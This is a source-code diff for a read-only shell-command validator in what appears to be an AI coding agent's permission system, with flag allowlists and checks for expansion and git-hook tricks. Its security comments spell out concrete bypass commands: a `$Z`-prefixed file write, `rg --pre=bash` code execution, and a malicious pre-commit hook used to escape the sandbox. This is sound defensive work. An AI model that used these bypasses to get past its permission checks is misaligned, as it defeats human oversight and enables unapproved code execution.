+            '--dccp': 'none',
+            '-w': 'none',
+            '--raw': 'none',
+            '-x': 'none',
+            '--unix': 'none',
+            '--tipc': 'none',
+            '--vsock': 'none',
+            '-f': 'string',
+            '--family': 'string',
+            '-A': 'string',
+            '--query': 'string',
+            '--socket': 'string',
+            '-Z': 'none',
+            '--context': 'none',
+            '-z': 'none',
+            '--contexts': 'none',
+            // SECURITY: -N/--net EXCLUDED — performs setns(), unshare(), mount(), umount()
+            // to switch network namespace. While isolated to forked process, too invasive.
+            '-b': 'none',
+            '--bpf': 'none',
+            '-E': 'none',
+            '--events': 'none',
+            '-H': 'none',
+            '--no-header': 'none',
+            '-O': 'none',
+            '--oneline': 'none',
+            '--tipcinfo': 'none',
+            '--tos': 'none',
+            '--cgroup': 'none',
+            '--inet-sockopt': 'none',
+            // SECURITY: -K/--kill EXCLUDED — forcibly closes sockets
+            // SECURITY: -D/--diag EXCLUDED — dumps raw TCP data to a file
+            // SECURITY: -F/--filter EXCLUDED — reads filter expressions from a file
+        },
+    },
+    // fd/fdfind — fast file finder (fd-find). Read-only search tool.
+    // SECURITY: -x/--exec (execute command per result) and -X/--exec-batch
+    // (execute command with all results) are deliberately excluded.
+    fd: { safeFlags: { ...FD_SAFE_FLAGS } },
+    // fdfind is the Debian/Ubuntu package name for fd — same binary, same flags
+    fdfind: { safeFlags: { ...FD_SAFE_FLAGS } },
+    ...PYRIGHT_READ_ONLY_COMMANDS,
+    ...DOCKER_READ_ONLY_COMMANDS,
+};
+// gh commands are ant-only since they make network requests, which goes against
+// the read-only validation principle of no network access
+const ANT_ONLY_COMMAND_ALLOWLIST = {
+    // All gh read-only commands from shared validation map
+    ...GH_READ_ONLY_COMMANDS,
+    // aki — Anthropic internal knowledge-base search CLI.
+    // Network read-only (same policy as gh). --audit-csv omitted: writes to disk.
+    aki: {
+        safeFlags: {
+            '-h': 'none',
+            '--help': 'none',
+            '-k': 'none',
+            '--keyword': 'none',
+            '-s': 'none',
+            '--semantic': 'none',
+            '--no-adaptive': 'none',
+            '-n': 'number',
+            '--limit': 'number',
+            '-o': 'number',
+            '--offset': 'number',
+            '--source': 'string',
+            '--exclude-source': 'string',
+            '-a': 'string',
+            '--after': 'string',
+            '-b': 'string',
+            '--before': 'string',
+            '--collection': 'string',
+            '--drive': 'string',
+            '--folder': 'string',
+            '--descendants': 'none',
+            '-m': 'string',
+            '--meta': 'string',
+            '-t': 'string',
+            '--threshold': 'string',
+            '--kw-weight': 'string',
+            '--sem-weight': 'string',
+            '-j': 'none',
+            '--json': 'none',
+            '-c': 'none',
+            '--chunk': 'none',
+            '--preview': 'none',
+            '-d': 'none',
+            '--full-doc': 'none',
+            '-v': 'none',
+            '--verbose': 'none',
+            '--stats': 'none',
+            '-S': 'number',
+            '--summarize': 'number',
+            '--explain': 'none',
+            '--examine': 'string',
+            '--url': 'string',
+            '--multi-turn': 'number',
+            '--multi-turn-model': 'string',
+            '--multi-turn-context': 'string',
+            '--no-rerank': 'none',
+            '--audit': 'none',
+            '--local': 'none',
+            '--staging': 'none',
+        },
+    },
+};
+function getCommandAllowlist() {
+    let allowlist = COMMAND_ALLOWLIST;
+    // On Windows, xargs can be used as a data-to-code bridge: if a file contains
+    // a UNC path, `cat file | xargs cat` feeds that path to cat, triggering SMB
+    // resolution. Since the UNC path is in file contents (not the command string),
+    // regex-based detection cannot catch this.
+    if (getPlatform() === 'windows') {
+        const { xargs: _, ...rest } = allowlist;
+        allowlist = rest;
+    }
+    if (process.env.USER_TYPE === 'ant') {
+        return { ...allowlist, ...ANT_ONLY_COMMAND_ALLOWLIST };
+    }
+    return allowlist;
+}
+/**
+ * Commands that are safe to use as xargs targets for auto-approval.
+ *
+ * SECURITY: Only add a command to this list if it has NO flags that can:
+ * 1. Write to files (e.g., find's -fprint, sed's -i)
+ * 2. Execute code (e.g., find's -exec, awk's system(), perl's -e)
+ * 3. Make network requests
+ *
+ * These commands must be purely read-only utilities. When xargs uses one of
+ * these as a target, we stop validating flags after the target command
+ * (see the `break` in isCommandSafeViaFlagParsing), so the command itself
+ * must not have ANY dangerous flags, not just a safe subset.
+ *
+ * Each command was verified by checking its man page for dangerous capabilities.
+ */
+const SAFE_TARGET_COMMANDS_FOR_XARGS = [
+    'echo', // Output only, no dangerous flags
+    'printf', // xargs runs /usr/bin/printf (binary), not bash builtin — no -v support
+    'wc', // Read-only counting, no dangerous flags
+    'grep', // Read-only search, no dangerous flags
+    'head', // Read-only, no dangerous flags
+    'tail', // Read-only (including -f follow), no dangerous flags
+];
+/**
+ * Unified command validation function that replaces individual validator functions.
+ * Uses declarative configuration from COMMAND_ALLOWLIST to validate commands and their flags.
+ * Handles combined flags, argument validation, and shell quoting bypass detection.
+ */
+export function isCommandSafeViaFlagParsing(command) {
+    // Parse the command to get individual tokens using shell-quote for accuracy
+    // Handle glob operators by converting them to strings, they don't matter from the perspective
+    // of this function
+    const parseResult = tryParseShellCommand(command, env => `$${env}`);
+    if (!parseResult.success)
+        return false;
+    const parsed = parseResult.tokens.map(token => {
+        if (typeof token !== 'string') {
+            token = token;
+            if (token.op === 'glob') {
+                return token.pattern;
+            }
+        }
+        return token;
+    });
+    // If there are operators (pipes, redirects, etc.), it's not a simple command.
+    // Breaking commands down into their constituent parts is handled upstream of
+    // this function, so we reject anything with operators here.
+    const hasOperators = parsed.some(token => typeof token !== 'string');
+    if (hasOperators) {
+        return false;
+    }
+    // Now we know all tokens are strings
+    const tokens = parsed;
+    if (tokens.length === 0) {
+        return false;
+    }
+    // Find matching command configuration
+    let commandConfig;
+    let commandTokens = 0;
+    // Check for multi-word commands first (e.g., "git diff", "git stash list")
+    const allowlist = getCommandAllowlist();
+    for (const [cmdPattern] of Object.entries(allowlist)) {
+        const cmdTokens = cmdPattern.split(' ');
+        if (tokens.length >= cmdTokens.length) {
+            let matches = true;
+            for (let i = 0; i < cmdTokens.length; i++) {
+                if (tokens[i] !== cmdTokens[i]) {
+                    matches = false;
+                    break;
+                }
+            }
+            if (matches) {
+                commandConfig = allowlist[cmdPattern];
+                commandTokens = cmdTokens.length;
+                break;
+            }
+        }
+    }
+    if (!commandConfig) {
+        return false; // Command not in allowlist
+    }
+    // Special handling for git ls-remote to reject URLs that could lead to data exfiltration
+    if (tokens[0] === 'git' && tokens[1] === 'ls-remote') {
+        // Check if any argument looks like a URL or remote specification
+        for (let i = 2; i < tokens.length; i++) {
+            const token = tokens[i];
+            if (token && !token.startsWith('-')) {
+                // Reject HTTP/HTTPS URLs
+                if (token.includes('://')) {
+                    return false;
+                }
+                // Reject SSH URLs like git@github.com:user/repo.git
+                if (token.includes('@') || token.includes(':')) {
+                    return false;
+                }
+                // Reject variable references
+                if (token.includes('$')) {
+                    return false;
+                }
+            }
+        }
+    }
+    // SECURITY: Reject ANY token containing `$` (variable expansion). The
+    // `env => \`$${env}\`` callback at line 825 preserves `$VAR` as LITERAL TEXT
+    // in tokens, but bash expands it at runtime (unset vars → empty string).
+    // This parser differential defeats BOTH validateFlags and callbacks:
+    //
+    //   (1) `$VAR`-prefix defeats validateFlags `startsWith('-')` check:
+    //       `git diff "$Z--output=/tmp/pwned"` → token `$Z--output=/tmp/pwned`
+    //       (starts with `$`) falls through as positional at ~:1730. Bash runs
+    //       `git diff --output=/tmp/pwned`. ARBITRARY FILE WRITE, zero perms.
+    //
+    //   (2) `$VAR`-prefix → RCE via `rg --pre`:
+    //       `rg . "$Z--pre=bash" FILE` → executes `bash FILE`. rg's config has
+    //       no regex and no callback. SINGLE-STEP ARBITRARY CODE EXECUTION.
+    //
+    //   (3) `$VAR`-infix defeats additionalCommandIsDangerousCallback regex:
+    //       `ps ax"$Z"e` → token `ax$Ze`. The ps callback regex
+    //       `/^[a-zA-Z]*e[a-zA-Z]*$/` fails on `$` → "not dangerous". Bash runs
+    //       `ps axe` → env vars for all processes. A fix limited to `$`-PREFIXED
+    //       tokens would NOT close this.
+    //
+    // We check ALL tokens after the command prefix. Any `$` means we cannot
+    // determine the runtime token value, so we cannot verify read-only safety.
+    // This check must run BEFORE validateFlags and BEFORE callbacks.
+    for (let i = commandTokens; i < tokens.length; i++) {
+        const token = tokens[i];
+        if (!token)
+            continue;
+        // Reject any token containing $ (variable expansion)
+        if (token.includes('$')) {
+            return false;
+        }
+        // Reject tokens with BOTH `{` and `,` (brace expansion obfuscation).
+        // `git diff {@'{'0},--output=/tmp/pwned}` → shell-quote strips quotes
+        // → token `{@{0},--output=/tmp/pwned}` has `{` + `,` → brace expansion.
+        // This is defense-in-depth with validateBraceExpansion in bashSecurity.ts.
+        // We require BOTH `{` and `,` to avoid false positives on legitimate
+        // patterns: `stash@{0}` (git ref, has `{` no `,`), `{{.State}}` (Go
+        // template, no `,`), `prefix-{}-suffix` (xargs, no `,`). Sequence form
+        // `{1..5}` also needs checking (has `{` + `..`).
+        if (token.includes('{') && (token.includes(',') || token.includes('..'))) {
+            return false;
+        }
+    }
+    // Validate flags starting after the command tokens
+    if (!validateFlags(tokens, commandTokens, commandConfig, {
+        commandName: tokens[0],
+        rawCommand: command,
+        xargsTargetCommands: tokens[0] === 'xargs' ? SAFE_TARGET_COMMANDS_FOR_XARGS : undefined,
+    })) {
+        return false;
+    }
+    if (commandConfig.regex && !commandConfig.regex.test(command)) {
+        return false;
+    }
+    if (!commandConfig.regex && /`/.test(command)) {
+        return false;
+    }
+    // Block newlines and carriage returns in grep/rg patterns as they can be used for injection
+    if (!commandConfig.regex &&
+        (tokens[0] === 'rg' || tokens[0] === 'grep') &&
+        /[\n\r]/.test(command)) {
+        return false;
+    }
+    if (commandConfig.additionalCommandIsDangerousCallback &&
+        commandConfig.additionalCommandIsDangerousCallback(command, tokens.slice(commandTokens))) {
+        return false;
+    }
+    return true;
+}
+/**
+ * Creates a regex pattern that matches safe invocations of a command.
+ *
+ * The regex ensures commands are invoked safely by blocking:
+ * - Shell metacharacters that could lead to command injection or redirection
+ * - Command substitution via backticks or $()
+ * - Variable expansion that could contain malicious payloads
+ * - Environment variable assignment bypasses (command=value)
+ *
+ * @param command The command name (e.g., 'date', 'npm list', 'ip addr')
+ * @returns RegExp that matches safe invocations of the command
+ */
+function makeRegexForSafeCommand(command) {
+    // Create regex pattern: /^command(?:\s|$)[^<>()$`|{}&;\n\r]*$/
+    return new RegExp(`^${command}(?:\\s|$)[^<>()$\`|{}&;\\n\\r]*$`);
+}
+// Simple commands that are safe for execution (converted to regex patterns using makeRegexForSafeCommand)
+// WARNING: If you are adding new commands here, be very careful to ensure
+// they are truly safe. This includes ensuring:
+// 1. That they don't have any flags that allow file writing or command execution
+// 2. Use makeRegexForSafeCommand() to ensure proper regex pattern creation
+const READONLY_COMMANDS = [
+    // Cross-platform commands from shared validation
+    ...EXTERNAL_READONLY_COMMANDS,
+    // Unix/bash-specific read-only commands (not shared because they don't exist in PowerShell)
+    // Time and date
+    'cal',
+    'uptime',
+    // File content viewing (relative paths handled separately)
+    'cat',
+    'head',
+    'tail',
+    'wc',
+    'stat',
+    'strings',
+    'hexdump',
+    'od',
+    'nl',
+    // System info
+    'id',
+    'uname',
+    'free',
+    'df',
+    'du',
+    'locale',
+    'groups',
+    'nproc',
+    // Path information
+    'basename',
+    'dirname',
+    'realpath',
+    // Text processing
+    'cut',
+    'paste',
+    'tr',
+    'column',
+    'tac', // Reverse cat — displays file contents in reverse line order
+    'rev', // Reverse characters in each line
+    'fold', // Wrap lines to specified width
+    'expand', // Convert tabs to spaces
+    'unexpand', // Convert spaces to tabs
+    'fmt', // Simple text formatter — output to stdout only
+    'comm', // Compare sorted files line by line
+    'cmp', // Byte-by-byte file comparison
+    'numfmt', // Number format conversion
+    // Path information (additional)
+    'readlink', // Resolve symlinks — displays target of symbolic link
+    // File comparison
+    'diff',
+    // true and false, used to silence or create errors
+    'true',
+    'false',
+    // Misc. safe commands
+    'sleep',
+    'which',
+    'type',
+    'expr', // Evaluate expressions (arithmetic, string matching)
+    'test', // Conditional evaluation (file checks, comparisons)
+    'getconf', // Get system configuration values
+    'seq', // Generate number sequences
+    'tsort', // Topological sort
+    'pr', // Paginate files for printing
+];
+// Complex commands that require custom regex patterns
+// Warning: If possible, avoid adding new regexes here and prefer using COMMAND_ALLOWLIST
+// instead. This allowlist-based approach to CLI flags is more secure and avoids
+// vulns coming from gnu getopt_long.
+const READONLY_COMMAND_REGEXES = new Set([
+    // Convert simple commands to regex patterns using makeRegexForSafeCommand
+    ...READONLY_COMMANDS.map(makeRegexForSafeCommand),
+    // Echo that doesn't execute commands or use variables
+    // Allow newlines in single quotes (safe) but not in double quotes (could be dangerous with variable expansion)
+    // Also allow optional 2>&1 stderr redirection at the end
+    /^echo(?:\s+(?:'[^']*'|"[^"$<>\n\r]*"|[^|;&`$(){}><#\\!"'\s]+))*(?:\s+2>&1)?\s*$/,
+    // Thaddeus CLI help
+    /^claude -h$/,
+    /^claude --help$/,
+    // Git readonly commands are now handled via COMMAND_ALLOWLIST with explicit flag validation
+    // (git status, git blame, git ls-files, git config --get, git remote, git tag, git branch)
+    /^uniq(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?|-[fsw]\s+\d+))*(?:\s|$)\s*$/, // Only allow flags, no input/output files
+    // System info
+    /^pwd$/,
+    /^whoami$/,
+    // env and printenv removed - could expose sensitive environment variables
+    // Development tools version checking - exact match only, no suffix allowed.
+    // SECURITY: `node -v --run <task>` would execute package.json scripts because
+    // Node processes --run before -v. Python/python3 --version are also anchored
+    // for defense-in-depth. These were previously in EXTERNAL_READONLY_COMMANDS which
+    // flows through makeRegexForSafeCommand and permits arbitrary suffixes.
+    /^node -v$/,
+    /^node --version$/,
+    /^python --version$/,
+    /^python3 --version$/,
+    // Misc. safe commands
+    // tree command moved to COMMAND_ALLOWLIST for proper flag validation (blocks -o/--output)
+    /^history(?:\s+\d+)?\s*$/, // Only allow bare history or history with numeric argument - prevents file writing
+    /^alias$/,
+    /^arch(?:\s+(?:--help|-h))?\s*$/, // Only allow arch with help flags or no arguments
+    // Network commands - only allow exact commands with no arguments to prevent network manipulation
+    /^ip addr$/, // Only allow "ip addr" with no additional arguments
+    /^ifconfig(?:\s+[a-zA-Z][a-zA-Z0-9_-]*)?\s*$/, // Allow ifconfig with interface name only (must start with letter)
+    // JSON processing with jq - allow with inline filters and file arguments
+    // File arguments are validated separately by pathValidation.ts
+    // Allow pipes and complex expressions within quotes but prevent dangerous flags
+    // Block command substitution - backticks are dangerous even in single quotes for jq
+    // Block -f/--from-file, --rawfile, --slurpfile (read files into jq), --run-tests, -L/--library-path (load executable modules)
+    // Block 'env' builtin and '$ENV' object which can access environment variables (defense in depth)
+    /^jq(?!\s+.*(?:-f\b|--from-file|--rawfile|--slurpfile|--run-tests|-L\b|--library-path|\benv\b|\$ENV\b))(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?))*(?:\s+'[^'`]*'|\s+"[^"`]*"|\s+[^-\s'"][^\s]*)+\s*$/,
+    // Path commands (path validation ensures they're allowed)
+    // cd command - allows changing to directories
+    /^cd(?:\s+(?:'[^']*'|"[^"]*"|[^\s;|&`$(){}><#\\]+))?$/,
+    // ls command - allows listing directories
+    /^ls(?:\s+[^<>()$`|{}&;\n\r]*)?$/,
+    // find command - blocks dangerous flags
+    // Allow escaped parentheses \( and \) for grouping, but block unescaped ones
+    // NOTE: \\[()] must come BEFORE the character class to ensure \( is matched as an escaped paren,
+    // not as backslash + paren (which would fail since paren is excluded from the character class)
+    /^find(?:\s+(?:\\[()]|(?!-delete\b|-exec\b|-execdir\b|-ok\b|-okdir\b|-fprint0?\b|-fls\b|-fprintf\b)[^<>()$`|{}&;\n\r\s]|\s)+)?$/,
+]);
+/**
+ * Checks if a command contains glob characters (?, *, [, ]) or expandable `$`
+ * variables OUTSIDE the quote contexts where bash would treat them as literal.
+ * These could expand to bypass our regex-based security checks.
+ *
+ * Glob examples:
+ * - `python *` could expand to `python --help` if a file named `--help` exists
+ * - `find ./ -?xec` could expand to `find ./ -exec` if such a file exists
+ * Globs are literal inside BOTH single and double quotes.
+ *
+ * Variable expansion examples:
+ * - `uniq --skip-chars=0$_` → `$_` expands to last arg of previous command;
+ *   with IFS word splitting, this smuggles positional args past "flags-only"
+ *   regexes. `echo " /etc/passwd /tmp/x"; uniq --skip-chars=0$_` → FILE WRITE.
+ * - `cd "$HOME"` → double-quoted `$HOME` expands at runtime.
+ * Variables are literal ONLY inside single quotes; they expand inside double
+ * quotes and unquoted.
+ *
+ * The `$` check guards the READONLY_COMMAND_REGEXES fallback path. The `$`
+ * token check in isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST
+ * commands; hand-written regexes like uniq's `\S+` and cd's `"[^"]*"` allow `$`.
+ * Matches `$` followed by `[A-Za-z_@*#?!$0-9-]` covering `$VAR`, `$_`, `$@`,
+ * `$*`, `$#`, `$?`, `$!`, `$$`, `$-`, `$0`-`$9`. Does NOT match `${` or `$(` —
+ * those are caught by COMMAND_SUBSTITUTION_PATTERNS in bashSecurity.ts.
+ *
+ * @param command The command string to check
+ * @returns true if the command contains unquoted glob or expandable `$`
+ */
+function containsUnquotedExpansion(command) {
+    // Track quote state to avoid false positives for patterns inside quoted strings
+    let inSingleQuote = false;
+    let inDoubleQuote = false;
+    let escaped = false;
+    for (let i = 0; i < command.length; i++) {
+        const currentChar = command[i];
+        // Handle escape sequences
+        if (escaped) {
+            escaped = false;
+            continue;
+        }
+        // SECURITY: Only treat backslash as escape OUTSIDE single quotes. In bash,
+        // `\` inside `'...'` is LITERAL — it does not escape the next character.
+        // Without this guard, `'\'` desyncs the quote tracker: the `\` sets
+        // escaped=true, then the closing `'` is consumed by the escaped-skip
+        // instead of toggling inSingleQuote. Parser stays in single-quote
+        // mode for the rest of the command, missing ALL subsequent expansions.
+        // Example: `ls '\' *` — bash sees glob `*`, but desynced parser thinks
+        // `*` is inside quotes → returns false (glob NOT detected).
+        // Defense-in-depth: hasShellQuoteSingleQuoteBug catches `'\'` patterns
+        // before this function is reached, but we fix the tracker anyway for
+        // consistency with the correct implementations in bashSecurity.ts.
+        if (currentChar === '\\' && !inSingleQuote) {
+            escaped = true;
+            continue;
+        }
+        // Update quote state
+        if (currentChar === "'" && !inDoubleQuote) {
+            inSingleQuote = !inSingleQuote;
+            continue;
+        }
+        if (currentChar === '"' && !inSingleQuote) {
+            inDoubleQuote = !inDoubleQuote;
+            continue;
+        }
+        // Inside single quotes: everything is literal. Skip.
+        if (inSingleQuote) {
+            continue;
+        }
+        // Check `$` followed by variable-name or special-parameter character.
+        // `$` expands inside double quotes AND unquoted (only SQ makes it literal).
+        if (currentChar === '$') {
+            const next = command[i + 1];
+            if (next && /[A-Za-z_@*#?!$0-9-]/.test(next)) {
+                return true;
+            }
+        }
+        // Globs are literal inside double quotes too. Only check unquoted.
+        if (inDoubleQuote) {
+            continue;
+        }
+        // Check for glob characters outside all quotes.
+        // These could expand to anything, including dangerous flags.
+        if (currentChar && /[?*[\]]/.test(currentChar)) {
+            return true;
+        }
+    }
+    return false;
+}
+/**
+ * Checks if a single command string is read-only based on READONLY_COMMAND_REGEXES.
+ * Internal helper function that validates individual commands.
+ *
+ * @param command The command string to check
+ * @returns true if the command is read-only
+ */
+function isCommandReadOnly(command) {
+    // Handle common stderr-to-stdout redirection pattern
+    // This handles both "command 2>&1" at the end of a full command
+    // and "command 2>&1" as part of a pipeline component
+    let testCommand = command.trim();
+    if (testCommand.endsWith(' 2>&1')) {
+        // Remove the stderr redirection for pattern matching
+        testCommand = testCommand.slice(0, -5).trim();
+    }
+    // Check for Windows UNC paths that could be vulnerable to WebDAV attacks
+    // Do this early to prevent any command with UNC paths from being marked as read-only
+    if (containsVulnerableUncPath(testCommand)) {
+        return false;
+    }
+    // Check for unquoted glob characters and expandable `$` variables that could
+    // bypass our regex-based security checks. We can't know what these expand to
+    // at runtime, so we can't verify the command is read-only.
+    //
+    // Globs: `python *` could expand to `python --help` if such a file exists.
+    //
+    // Variables: `uniq --skip-chars=0$_` — bash expands `$_` at runtime to the
+    // last arg of the previous command. With IFS word splitting, this smuggles
+    // positional args past "flags-only" regexes like uniq's `\S+`. The `$` token
+    // check inside isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST
+    // commands; hand-written regexes in READONLY_COMMAND_REGEXES (uniq, jq, cd)
+    // have no such guard. See containsUnquotedExpansion for full analysis.
+    if (containsUnquotedExpansion(testCommand)) {
+        return false;
+    }
+    // Tools like git allow `--upload-pack=cmd` to be abbreviated as `--up=cmd`
+    // Regex filters can be bypassed, so we use strict allowlist validation instead.
+    // This requires defining a set of known safe flags. Thaddeus can help with this,
+    // but please look over it to ensure it didn't add any flags that allow file writes
+    // code execution, or network requests.
+    if (isCommandSafeViaFlagParsing(testCommand)) {
+        return true;
+    }
+    for (const regex of READONLY_COMMAND_REGEXES) {
+        if (regex.test(testCommand)) {
+            // Prevent git commands with -c flag to avoid config options that can lead to code execution
+            // The -c flag allows setting arbitrary git config values inline, including dangerous ones like
+            // core.fsmonitor, diff.external, core.gitProxy, etc. that can execute arbitrary commands
+            // Check for -c preceded by whitespace and followed by whitespace or equals
+            // Using regex to catch spaces, tabs, and other whitespace (not part of other flags like --cached)
+            if (testCommand.includes('git') && /\s-c[\s=]/.test(testCommand)) {
+                return false;
+            }
+            // Prevent git commands with --exec-path flag to avoid path manipulation that can lead to code execution
+            // The --exec-path flag allows overriding the directory where git looks for executables
+            if (testCommand.includes('git') &&
+                /\s--exec-path[\s=]/.test(testCommand)) {
+                return false;
+            }
+            // Prevent git commands with --config-env flag to avoid config injection via environment variables
+            // The --config-env flag allows setting git config values from environment variables, which can be
+            // just as dangerous as -c flag (e.g., core.fsmonitor, diff.external, core.gitProxy)
+            if (testCommand.includes('git') &&
+                /\s--config-env[\s=]/.test(testCommand)) {
+                return false;
+            }
+            return true;
+        }
+    }
+    return false;
+}
+/**
+ * Checks if a compound command contains any git command.
+ *
+ * @param command The full command string to check
+ * @returns true if any subcommand is a git command
+ */
+function commandHasAnyGit(command) {
+    return splitCommand_DEPRECATED(command).some(subcmd => isNormalizedGitCommand(subcmd.trim()));
+}
+/**
+ * Git-internal path patterns that can be exploited for sandbox escape.
+ * If a command creates these files and then runs git, the git command
+ * could execute malicious hooks from the created files.
+ */
+const GIT_INTERNAL_PATTERNS = [
+    /^HEAD$/,
+    /^objects(?:\/|$)/,
+    /^refs(?:\/|$)/,
+    /^hooks(?:\/|$)/,
+];
+/**
+ * Checks if a path is a git-internal path (HEAD, objects/, refs/, hooks/).
+ */
+function isGitInternalPath(path) {
+    // Normalize path by removing leading ./ or /
+    const normalized = path.replace(/^\.?\//, '');
+    return GIT_INTERNAL_PATTERNS.some(pattern => pattern.test(normalized));
+}
+// Commands that only delete or modify in-place (don't create new files at new paths)
+const NON_CREATING_WRITE_COMMANDS = new Set(['rm', 'rmdir', 'sed']);
+/**
+ * Extracts write paths from a subcommand using PATH_EXTRACTORS.
+ * Only returns paths for commands that can create new files/directories
+ * (write/create operations excluding deletion and in-place modification).
+ */
+function extractWritePathsFromSubcommand(subcommand) {
+    const parseResult = tryParseShellCommand(subcommand, env => `$${env}`);
+    if (!parseResult.success)
+        return [];
+    const tokens = parseResult.tokens.filter((t) => typeof t === 'string');
+    if (tokens.length === 0)
+        return [];
+    const baseCmd = tokens[0];
+    if (!baseCmd)
+        return [];
+    // Only consider commands that can create files at target paths
+    if (!(baseCmd in COMMAND_OPERATION_TYPE)) {
+        return [];
+    }
+    const opType = COMMAND_OPERATION_TYPE[baseCmd];
+    if ((opType !== 'write' && opType !== 'create') ||
+        NON_CREATING_WRITE_COMMANDS.has(baseCmd)) {
+        return [];
+    }
+    const extractor = PATH_EXTRACTORS[baseCmd];
+    if (!extractor)
+        return [];
+    return extractor(tokens.slice(1));
+}
+/**
+ * Checks if a compound command writes to any git-internal paths.
+ * This is used to detect potential sandbox escape attacks where a command
+ * creates git-internal files (HEAD, objects/, refs/, hooks/) and then runs git.
+ *
+ * SECURITY: A compound command could bypass the bare repo detection by:
+ * 1. Creating bare git repo files (HEAD, objects/, refs/, hooks/) in the same command
+ * 2. Then running git, which would execute malicious hooks
+ *
+ * Example attack:
+ * mkdir -p objects refs hooks && echo '#!/bin/bash\nmalicious' > hooks/pre-commit && touch HEAD && git status
+ *
+ * @param command The full command string to check
+ * @returns true if any subcommand writes to git-internal paths
+ */
+function commandWritesToGitInternalPaths(command) {
+    const subcommands = splitCommand_DEPRECATED(command);
+    for (const subcmd of subcommands) {
+        const trimmed = subcmd.trim();
+        // Check write paths from path-based commands (mkdir, touch, cp, mv)
+        const writePaths = extractWritePathsFromSubcommand(trimmed);
+        for (const path of writePaths) {
+            if (isGitInternalPath(path)) {
+                return true;
+            }
+        }
+        // Check output redirections (e.g., echo x > hooks/pre-commit)
+        const { redirections } = extractOutputRedirections(trimmed);
+        for (const { target } of redirections) {
+            if (isGitInternalPath(target)) {
+                return true;
+            }
+        }
+    }
+    return false;
+}
+/**
+ * Checks read-only constraints for bash commands.
+ * This is the single exported function that validates whether a command is read-only.
+ * It handles compound commands, sandbox mode, and safety checks.
+ *
+ * @param input The bash command input to validate
+ * @param compoundCommandHasCd Pre-computed flag indicating if any cd command exists in the compound command.
+ *                              This is computed by commandHasAnyCd() and passed in to avoid duplicate computation.
+ * @returns PermissionResult indicating whether the command is read-only
+ */
+export function checkReadOnlyConstraints(input, compoundCommandHasCd) {
+    const { command } = input;
+    // Detect if the command is not parseable and return early
+    const result = tryParseShellCommand(command, env => `$${env}`);
+    if (!result.success) {
+        return {
+            behavior: 'passthrough',
+            message: 'Command cannot be parsed, requires further permission checks',
+        };
+    }
+    // Check the original command for safety before splitting
+    // This is important because splitCommand_DEPRECATED may transform the command
+    // (e.g., ${VAR} becomes $VAR)
+    if (bashCommandIsSafe_DEPRECATED(command).behavior !== 'passthrough') {
+        return {
+            behavior: 'passthrough',
+            message: 'Command is not read-only, requires further permission checks',
+        };
+    }
+    // Check for Windows UNC paths in the original command before transformation
+    // This must be done before splitCommand_DEPRECATED because splitCommand_DEPRECATED may transform backslashes
+    if (containsVulnerableUncPath(command)) {
+        return {
+            behavior: 'ask',
+            message: 'Command contains Windows UNC path that could be vulnerable to WebDAV attacks',
+        };
+    }
+    // Check once if any subcommand is a git command (used for multiple security checks below)
+    const hasGitCommand = commandHasAnyGit(command);
+    // SECURITY: Block compound commands that have both cd AND git
+    // This prevents sandbox escape via: cd /malicious/dir && git status
+    // where the malicious directory contains fake git hooks that execute arbitrary code.
+    if (compoundCommandHasCd && hasGitCommand) {
+        return {
+            behavior: 'passthrough',
+            message: 'Compound commands with cd and git require permission checks for enhanced security',
+        };
+    }
+    // SECURITY: Block git commands if the current directory looks like a bare/exploited git repo
+    // This prevents sandbox escape when an attacker has:
+    // 1. Deleted .git/HEAD to invalidate the normal git directory
+    // 2. Created hooks/pre-commit or other git-internal files in the current directory
+    // Git would then treat the cwd as the git directory and execute malicious hooks.
+    if (hasGitCommand && isCurrentDirectoryBareGitRepo()) {
+        return {
+            behavior: 'passthrough',
+            message: 'Git commands in directories with bare repository structure require permission checks for enhanced security',
+        };
+    }
+    // SECURITY: Block compound commands that write to git-internal paths AND run git
+    // This prevents sandbox escape where a command creates git-internal files
+    // (HEAD, objects/, refs/, hooks/) and then runs git, which would execute
+    // malicious hooks from the newly created files.
+    // Example attack: mkdir -p hooks && echo 'malicious' > hooks/pre-commit && git status
+    if (hasGitCommand && commandWritesToGitInternalPaths(command)) {
+        return {
+            behavior: 'passthrough',
+            message: 'Compound commands that create git internal files and run git require permission checks for enhanced security',
+        };
+    }
+    // SECURITY: Only auto-allow git commands as read-only if we're in the original cwd
+    // (which is protected by sandbox denyWrite) or if sandbox is disabled (attack is moot).
+    // Race condition: a sandboxed command can create bare repo files in a subdirectory,
+    // and a backgrounded git command (e.g. sleep 10 && git status) would pass the
+    // isCurrentDirectoryBareGitRepo() check at evaluation time before the files exist.
+    if (hasGitCommand &&
+        SandboxManager.isSandboxingEnabled() &&
+        getCwd() !== getOriginalCwd()) {
+        return {
+            behavior: 'passthrough',
+            message: 'Git commands outside the original working directory require permission checks when sandbox is enabled',
+        };
+    }
+    // Check if all subcommands are read-only
+    const allSubcommandsReadOnly = splitCommand_DEPRECATED(command).every(subcmd => {
+        if (bashCommandIsSafe_DEPRECATED(subcmd).behavior !== 'passthrough') {
+            return false;
+        }
+        return isCommandReadOnly(subcmd);
+    });
+    if (allSubcommandsReadOnly) {
+        return {
+            behavior: 'allow',
+            updatedInput: input,
+        };
+    }
+    // If not read-only, return passthrough to let other permission checks handle it
+    return {
+        behavior: 'passthrough',
+        message: 'Command is not read-only, requires further permission checks',
+    };
+}